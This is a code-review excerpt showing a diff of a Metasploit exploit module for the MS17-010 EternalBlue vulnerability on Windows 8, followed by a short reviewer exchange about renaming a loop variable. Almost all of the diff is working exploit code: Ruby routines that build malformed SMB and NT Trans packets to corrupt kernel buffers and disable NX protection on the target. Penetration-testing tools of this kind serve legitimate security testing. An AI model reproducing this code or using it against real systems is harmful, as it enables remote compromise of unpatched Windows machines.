modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb

```diff
@@ -0,0 +1,893 @@
+    pkt = "\x00".b + "\x00".b + [0x8100].pack('S>')
+    # There is no need to be SMB2 because we want the target free the corrupted buffer.
+    # Also this is invalid SMB2 message.
+    # I believe NSA exploit use SMB2 for hiding alert from IDS
+    # pkt += '\xfeSMB' # smb2
+    # it can be anything even it is invalid
+    pkt += "\x01\x02\x03\x04"
+
+    if for_nx
+      # MUST set no delay because 1 byte MUST be sent immediately
+      sock.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
+      pkt += "\x00" * 0x7b # another byte will be sent later to disabling NX
+    else
+      pkt += "\x00" * 0x7c
+    end
+
+    sock.send(pkt, 0)
+    sock
+  end
+
+  def send_big_trans2(conn, tid, pid, setup, data, param, first_data_fragment_size, send_last_chunk: true)
+    pkt = RubySMB::SMB1::Packet::NtTrans::Request.new
+    pkt.smb_header.tid = tid
+
+    pkt.smb_header.pid_low = pid
+
+    command = [setup].pack('S<')
+
+    pkt.parameter_block.max_setup_count = 1
+    pkt.parameter_block.max_parameter_count = param.length
+    pkt.parameter_block.max_data_count = 0
+
+    pkt.parameter_block.setup << 0x0000
+    pkt.parameter_block.total_parameter_count = param.length
+    pkt.parameter_block.total_data_count = data.length
+
+    fixed_offset = 32 + 3 + 38 + command.length
+    if !param.empty?
+      pad_len = (4 - fixed_offset % 4) % 4
+      pad_bytes = "\x00" * pad_len
+      pkt.data_block.pad1 = pad_bytes
+    else
+      pkt.data_block.pad1 = ''
+      pad_len = 0
+    end
+
+    pkt.parameter_block.parameter_count = param.length
+    pkt.parameter_block.parameter_offset = fixed_offset + pad_len
+
+    if !data.empty?
+      pad_len = (4 - (fixed_offset + pad_len + param.length) % 4) % 4
+      pkt.data_block.pad2 = "\x00" * pad_len
+    else
+      pkt.data_block.pad2 = ''
+      pad_len = 0
+    end
+
+    pkt.parameter_block.data_count = first_data_fragment_size
+    pkt.parameter_block.data_offset = pkt.parameter_block.parameter_offset + param.length + pad_len
+
+    pkt.data_block.trans2_parameters = param
+    pkt.data_block.trans2_data = data.first(first_data_fragment_size)
+
+    pkt.smb_header.flags2.paging_io = 0
+    pkt.smb_header.flags2.extended_security = 1
+
+    recv_pkt = RubySMB::SMB1::Packet::NtTrans::Response.read(conn.send_recv(pkt))
+
+    if recv_pkt.status_code.value == 0
+      print_good('got good NT Trans response')
+    else
+      print_error("got bad NT Trans response: #{recv_pkt.status_code.name}\n#{recv_pkt.status_code.description}")
+      return nil
+    end
+
+    # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
+    i = first_data_fragment_size
+    while i < data.length
+      send_size = [4096, data.length - i].min
+      if data.length - i <= 4096 && !send_last_chunk
+        break
+      end
+
+      send_trans2_second(conn, tid, pid, data[i...i + send_size], i)
+      i += send_size
+    end
+
+    if send_last_chunk
+      conn.recv_packet
+    end
+
+    i
```

Comment:
what does `i` represent here? total amount of data sent? might be worth a more descriptive name

Reply:
Replaced `i` with `size_of_data_to_be_sent`. It's wordier but it's also the best name for the var